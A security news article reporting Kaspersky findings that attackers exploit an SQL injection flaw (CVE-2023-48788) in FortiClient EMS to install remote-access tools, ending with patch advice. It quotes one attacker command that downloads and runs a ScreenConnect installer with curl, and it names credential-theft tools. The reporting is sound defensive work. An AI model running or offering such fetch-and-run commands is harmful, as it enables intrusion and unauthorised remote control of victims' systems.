InfoSecBulletin Cybersecurity for mankind
Kaspersky’s Global Emergency Response Team (GERT) found that attackers are exploiting a patched SQL injection vulnerability (CVE-2023-48788) in Fortinet FortiClient EMS, affecting versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2. Even with available patches, many systems remain unupdated, allowing unauthorized code execution and compromise of networks.
According to the report, The vulnerability comes from inadequate filtering of SQL input. An attacker can send crafted packets to execute unauthorized commands. It’s especially risky on Windows servers exposed to the internet, as these systems often handle vital functions like secure VPN access for employees.
Microsoft Patches Four Critical Azure and Power Apps Vulns
Qilin Ransomware topped April 2025 with 45+ data leak disclosures
SonicWall Patches 3 Flaws in SMA 100 Devices
Top Ransomware Actively Attacking Financial Sector: 406 Incidents Disclosed
Critical (CVSS 10) Flaw in Cisco IOS XE WLCs Allows RRA
CVE-2025-29824
Play Ransomware Exploited Windows CVE-2025-29824 as Zero-Day
Hacker exploited Samsung MagicINFO 9 Server RCE flaw
CISA adds Langflow flaw to its KEV catalog
Google Fixes Android Flaw (CVE-2025-27363) Exploited by Attackers
UAP hosted “UAP Cyber Siege 2025”, A national level cybersecurity competition
The attack usually starts by exploiting a vulnerability to install remote monitoring tools like AnyDesk and ScreenConnect. This gives attackers a way to access the network and carry out actions like stealing credentials, moving laterally, and avoiding detection.
In October 2024, GERT analysts discovered a vulnerability being exploited when telemetry alerts showed unauthorized access to registry hives through an admin account on a compromised Windows server. Investigations found that attackers used Base64-encoded payloads and tools like curl and certutil to download malicious installers.
One significant command found in the attackers’ scripts was:
curl -o C:\update.exe “https://infinity.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe” & start /B C:\update.exe & start /B C:\update.exe
The attackers showed adaptability by targeting various organizations, mainly in South America, and used platforms like webhook.site to collect data from vulnerable systems.
Key artifacts identified during the investigation included:
- Connections to external servers traced to IP addresses associated with previous malicious campaigns.
- Evidence of credential harvesting tools, such as mimikatz.exe and webbrowserpassview.exe.
- Suspicious entries in ems.log and sql_trace.log, pointing to SQL injection attempts.
GERT’s findings highlight the need to update FortiClient EMS to versions 7.0.11–7.0.13 or 7.2.3 and later.
